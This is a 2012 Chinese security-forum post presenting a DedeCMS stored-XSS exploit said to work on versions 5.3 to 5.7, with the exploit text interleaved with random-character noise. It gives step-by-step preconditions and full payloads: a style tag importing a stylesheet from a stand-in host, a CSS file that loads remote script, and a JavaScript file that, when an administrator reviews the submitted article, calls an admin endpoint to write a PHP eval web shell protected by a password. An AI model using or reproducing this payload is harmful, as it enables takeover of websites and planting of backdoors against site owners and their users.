找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1795|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
3 @9 T: `3 l: g为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)& v, ]" E7 G5 i; G& ^+ r
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
1 H+ x4 d( Y) K0 X" D下面说说利用方法。
' \) H4 B- A& _% _$ a条件有2个:
' @. O' b9 n$ X* M: C6 V5 c4 o9 v1.开启注册
8 r; d8 R; M. {+ e: z! G9 v9 s2.开启投稿/ s. _: x+ e& V$ [3 M  Q7 A8 [
注册会员----发表文章1 c$ {% v, I. ~/ j) _5 F' p
内容填写:9 e% y! Y, v/ t( k
复制代码: e$ l$ ?, f( c9 r9 M1 P
<style>@im\port'\http://xxx.com/xss.css';</style>2 D' f' e% ?! O* g
新建XSS.Css
& L/ ?- O2 D1 y6 l) {& ?* Y复制代码
3 }8 ~# {3 j. P$ v5 F.body{# e: K- B! M5 g
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }. P0 W7 }. @2 u! k% Q2 p
新建xss.js 内容为9 i( ~' B# O0 _, E$ v, a$ U
复制代码" p; c4 j* A1 K
1.var request = false;
6 I3 f* v3 w7 I( X1 x2.if(window.XMLHttpRequest) {
1 P: y8 n( g1 l9 ^. K/ @, D2 x3 a3.request = new XMLHttpRequest();8 Z/ w2 W. c- P" S: L$ p
4.if(request.overrideMimeType) {
/ @* Y8 K, q' c" y5.request.overrideMimeType('text/xml');. R& `9 ^+ A" v) u
6.}9 a4 b) ~* T* Y, \" j! @# P
7.} else if(window.ActiveXObject) {4 b' e' r1 Y. S8 p, T% k% u
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
( Z6 p+ a( j' O  j& q9.for(var i=0; i<versions.length; i++) {
. k/ G3 _+ C$ X9 S; [10.try {
! P- y' ~% |; `5 y+ y" m  H11.request = new ActiveXObject(versions);
( j1 [8 c6 e! {6 U$ b" A12.} catch(e) {}
( F7 L1 I8 z8 C1 l* G! M13.}4 Q: @* M6 r( S; F& a1 U
14.}! w9 E3 t8 }! _9 |& T
15.xmlhttp=request;2 ^2 C* f5 E6 M+ `) M4 B& \, r
16.function getFolder( url ){, f$ C' S2 a. }& V
17. obj = url.split('/')
* E/ [  M% U, C3 Z# e18. return obj[obj.length-2]. ]" X, N6 A# \9 ~! i. c
19.}
2 Y! u$ Z4 S7 X0 w5 B, Q20.oUrl = top.location.href;
$ d: n+ a2 G  {  K0 V- _% n" E21.u = getFolder(oUrl);5 H; B  s9 l( x2 ^8 H, I( U
22.add_admin();
. ]: m  F& q+ i) Y: z7 d1 H1 }23.function add_admin(){( A  c/ ^( l/ m0 E. U* t* y
24.var url= "/"+u+"/sys_sql_query.php";. ]. M, L5 _; q
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";# a1 m) n/ t4 q* a+ G
26.xmlhttp.open("POST", url, true);
. z* r7 P, u2 |/ F2 Y27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");" w- m6 j; A, h9 M4 S# w* H
28.xmlhttp.setRequestHeader("Content-length", params.length);5 L/ m/ m6 v' l4 C
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
5 f8 t( l( ~+ W: x. s30.xmlhttp.send(params);1 Y8 ]7 L; v! K, \: @9 D. x
31.}
( e* e$ ^6 G5 v' ^9 K当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表